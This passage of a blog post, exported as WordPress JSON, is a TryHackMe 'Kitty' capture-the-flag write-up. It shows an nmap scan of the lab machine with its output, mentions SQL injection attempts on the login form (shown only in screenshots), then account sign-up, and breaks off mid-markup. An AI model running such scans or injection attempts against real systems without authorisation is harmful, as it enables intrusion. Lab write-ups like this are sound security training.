{"id":422,"date":"2024-02-05T20:32:38","date_gmt":"2024-02-06T02:32:38","guid":{"rendered":"https:\/\/blog.ishsome.com\/?p=422"},"modified":"2024-04-16T20:54:42","modified_gmt":"2024-04-17T01:54:42","slug":"tryhackme-kitty","status":"publish","type":"post","link":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/","title":{"rendered":"TryHackMe: Kitty"},"content":{"rendered":"\n<p><a href=\"https:\/\/tryhackme.com\/room\/kitty\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">Kitty <\/a>from TryHackMe is a Linux machine running a web application with security vulnerabilities. We are tasked with finding the vulnerabilities and exploiting them to gain root privileges on the machine.<\/p>\n\n\n\n<div style=\"height:19px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">NMAP<\/mark><\/h3>\n\n\n\n<p>We have only two ports open 22 for SSH and HTTP port 80.<\/p>\n\n\n\n<div style=\"height:19px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Linux-Boxes\/Kitty]\n\u2514\u2500$ nmap -p22,80 10.10.113.181 -A -oN nmap\/kitty\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-02-03 08:26 CST\nNmap scan report for 10.10.113.181\nHost is up (0.20s latency).\n\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 b0:c5:69:e6:dd:6b:81:0c:da:32:be:41:e3:5b:97:87 (RSA)\n|   256 6c:65:ad:87:08:7a:3e:4c:7d:ea:3a:30:76:4d:04:16 (ECDSA)\n|_  256 2d:57:1d:56:f6:56:52:29:ea:aa:da:33:b2:77:2c:9c (ED25519)\n80\/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))\n|_http-title: Login\n| http-cookie-flags: \n|   \/: \n|     PHPSESSID: \n|_      httponly flag not set\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 14.36 seconds\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Linux-Boxes\/Kitty<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-p22,80<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.10<\/span><span style=\"color: #C3E88D\">.113.181<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-A<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-oN<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nmap\/kitty<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Starting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">7.94<\/span><span style=\"color: #C3E88D\">SVN<\/span><span style=\"color: #BABED8\"> ( <\/span><span style=\"color: #C3E88D\">https:\/\/nmap.org<\/span><span style=\"color: #BABED8\"> ) at 2024-02-03 08:26 CST<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">scan<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">report<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.10<\/span><span style=\"color: #C3E88D\">.113.181<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Host<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">is<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">up<\/span><span style=\"color: #BABED8\"> (0.20s <\/span><span style=\"color: #C3E88D\">latency<\/span><span style=\"color: #BABED8\">).<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">PORT<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">STATE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SERVICE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">VERSION<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">22\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">ssh<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #C3E88D\">OpenSSH<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">8.2<\/span><span style=\"color: #C3E88D\">p1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Ubuntu<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">4<\/span><span style=\"color: #C3E88D\">ubuntu0.5<\/span><span style=\"color: #BABED8\"> (Ubuntu <\/span><span style=\"color: #C3E88D\">Linux<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">protocol<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2.0<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">ssh-hostkey:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">3072<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">b0:c5:69:e6:dd:6b:81:0c:da:32:be:41:e3:5b:97:87<\/span><span style=\"color: #BABED8\"> (RSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">256<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">6<\/span><span style=\"color: #C3E88D\">c:65:ad:87:08:7a:3e:4c:7d:ea:3a:30:76:4d:04:16<\/span><span style=\"color: #BABED8\"> (ECDSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">256<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2<\/span><span style=\"color: #C3E88D\">d:57:1d:56:f6:56:52:29:ea:aa:da:33:b2:77:2c:9c<\/span><span style=\"color: #BABED8\"> (ED25519)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">80\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">http<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">Apache<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">httpd<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2.4<\/span><span style=\"color: #C3E88D\">.41<\/span><span style=\"color: #BABED8\"> ((Ubuntu))<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-title:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Login<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">http-cookie-flags:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">\/:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #FFCB6B\">PHPSESSID:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #C3E88D\">httponly<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">flag<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">set<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-server-header:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Apache\/2.4.41<\/span><span style=\"color: #BABED8\"> (Ubuntu)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Service<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Info:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">OS:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Linux<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">CPE:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">cpe:\/o:linux:linux_kernel<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Service<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">detection<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">performed.<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Please<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">report<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">any<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">incorrect<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">results<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">at<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">https:\/\/nmap.org\/submit\/<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">done:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">IP<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">address<\/span><span style=\"color: #BABED8\"> (1 <\/span><span style=\"color: #C3E88D\">host<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">up<\/span><span style=\"color: #BABED8\">) scanned <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 14.36 seconds<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">PORT 80 HTTP<\/mark><\/h4>\n\n\n\n<p>The webpage has a login form. We do not have any credentials yet to log in. We do have an option to sign up. Let&#8217;s try some basic SQL injection payloads and see if we can get in.<\/p>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0cbee3ab&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0cbee3ab\" class=\"wp-block-image size-full wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"968\" height=\"391\" data-attachment-id=\"437\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/image-13-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-13.png?fit=968%2C391&amp;ssl=1\" data-orig-size=\"968,391\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-13\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-13.png?fit=968%2C391&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-13.png?resize=968%2C391&#038;ssl=1\" alt=\"\" class=\"wp-image-437\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-13.png?w=968&amp;ssl=1 968w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-13.png?resize=300%2C121&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-13.png?resize=768%2C310&amp;ssl=1 768w\" sizes=\"auto, (max-width: 968px) 100vw, 968px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"128\" data-attachment-id=\"438\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/image-14-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-14.png?fit=1101%2C138&amp;ssl=1\" data-orig-size=\"1101,138\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-14\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-14.png?fit=1024%2C128&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-14.png?resize=1024%2C128&#038;ssl=1\" alt=\"\" class=\"wp-image-438\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-14.png?resize=1024%2C128&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-14.png?resize=300%2C38&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-14.png?resize=768%2C96&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-14.png?w=1101&amp;ssl=1 1101w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>It looks like our attempt to perform SQLi is being detected. We will have to find another way to log in.<\/p>\n\n\n\n<p>Let&#8217;s sign up and see if we get any additional information.<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0cbef9db&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0cbef9db\" class=\"wp-block-image size-full wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"915\" height=\"424\" data-attachment-id=\"423\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/image-5-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-5.png?fit=915%2C424&amp;ssl=1\" data-orig-size=\"915,424\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-5\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-5.png?fit=915%2C424&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-5.png?resize=915%2C424&#038;ssl=1\" alt=\"\" class=\"wp-image-423\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-5.png?w=915&amp;ssl=1 915w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-5.png?resize=300%2C139&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-5.png?resize=768%2C356&amp;ssl=1 768w\" sizes=\"auto, (max-width: 915px) 100vw, 915px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:26px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0cbf009f&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0cbf009f\" class=\"wp-block-image size-full is-resized wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"727\" height=\"510\" data-attachment-id=\"424\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/image-6-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-6.png?fit=727%2C510&amp;ssl=1\" data-orig-size=\"727,510\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-6\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-6.png?fit=727%2C510&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-6.png?resize=727%2C510&#038;ssl=1\" alt=\"\" class=\"wp-image-424\" style=\"width:841px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-6.png?w=727&amp;ssl=1 727w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-6.png?resize=300%2C210&amp;ssl=1 300w\" sizes=\"auto, (max-width: 727px) 100vw, 727px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Let&#8217;s log in now with our newly created account.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0cbf0708&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0cbf0708\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"294\" data-attachment-id=\"425\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/image-7-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-7.png?fit=1666%2C478&amp;ssl=1\" data-orig-size=\"1666,478\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-7\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-7.png?fit=1024%2C294&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" 